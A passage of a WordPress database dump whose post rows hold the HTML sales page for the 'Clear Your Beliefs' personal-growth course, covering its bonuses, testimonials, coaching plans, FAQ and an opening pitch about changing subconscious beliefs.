Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:49:43', '2014-06-18 01:49:43', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(993, 4194, '2014-06-17 21:02:42', '2014-06-18 02:02:42', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. 